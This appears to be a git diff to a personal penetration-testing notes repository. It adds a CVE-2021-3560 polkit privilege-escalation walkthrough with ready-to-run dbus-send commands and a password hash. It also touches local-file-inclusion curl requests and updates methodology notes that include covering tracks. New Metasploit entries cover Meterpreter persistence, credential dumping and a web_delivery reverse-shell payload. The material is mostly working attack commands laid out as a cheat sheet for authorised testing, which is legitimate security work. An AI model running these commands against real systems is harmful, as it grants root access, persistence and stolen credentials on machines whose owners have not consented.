diff --git a/exploit/linux/polkit.md b/exploit/linux/polkit.md new file mode 100644 index 0000000..7dcdba8 --- /dev/null +++ b/exploit/linux/polkit.md @@ -0,0 +1,24 @@ +# CVE-2021-3560 + +* Exploit `< 0.105-26ubuntu1.1` + + +## Racing Condition +* Request creation of account via dbus message and `pkexec`. sleep time is variable. +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $! +``` + * Create password via `openssl passwd -6 -salt salt password123` +```sh +dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $! +``` +* Request is killed after polkits receives it + +* Polkit requests uid of user who sent the message, which has been deleted +* Error will be thrown +* Uid turns to root afterwards +* Request succeeds + +* `su user1` and `sudo -s` + + diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index a292a04..83be44f 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -1,6 +1,8 @@ # Local File Inclusion To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed. +* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/) + ## Usage * Exploit URL parameter by including other files. @@ -28,3 +30,4 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ```HTTP curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' ``` + diff --git a/pentesting.md b/pentesting.md index c9ac379..c1026ba 100644 --- a/pentesting.md +++ b/pentesting.md @@ -1,4 +1,11 @@ -# Methodology +# Pentesting +Authorized audit of security systems of computers and networks. +* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) + * Permissions + * Scope + * Rules + +## Methodology * Steps * Reconnaissance @@ -8,7 +15,7 @@ * Covering Tracks * Reporting -## Reconnaissance +### Reconnaissance * Duck / SearX / metacrawler / google * Wikipedia * [Shodan.io](http://www.shodan.io) @@ -19,7 +26,7 @@ * builtwith.com * wappalyzer -## Enumeration +### Enumeration * nmap * nikto * gobuster @@ -27,16 +34,24 @@ * metasploit * enum4linux / linpeas / winpeas / linenum -## Exploitation +### Exploitation -## Privilege Escalation +### Post Exploitation +* Pivoting +#### Privilege Escalation +* Vertically or horizontally -## Covering Tracks +#### Covering Tracks -## Reporting +#### Reporting * Includes * Vulnerabilities * Criticality * Description * Countermeasures * Finding summary + +## Frameworks +* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf) +* [NIST](https://www.nist.gov/cyberframework) +* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance) diff --git a/persistence/meterpreter.md b/persistence/meterpreter.md new file mode 100644 index 0000000..e13b02c --- /dev/null +++ b/persistence/meterpreter.md @@ -0,0 +1,6 @@ +# Meterpreter Persistence + +## Load shell on system startup +```sh +run persistence -X +``` diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md index 414fb9d..5de49ff 100644 --- a/post_exploitation/docs/metasploit.md +++ b/post_exploitation/docs/metasploit.md @@ -48,3 +48,13 @@ run post/windows/gather/hashdump load kiwi lsa_dump_sam ``` + +### Webdelivery +```sh +use exploit/multi/script/web_delivery +show targets +set LPORT +set PAYLOAD windows/meterpreter/reverse_http +run -j +``` +* Copy into powershell/cmd diff --git a/reverse_shells/docs/prep b/reverse_shells/docs/prep new file mode 100644 index 0000000..c7e911e Binary files /dev/null and b/reverse_shells/docs/prep differ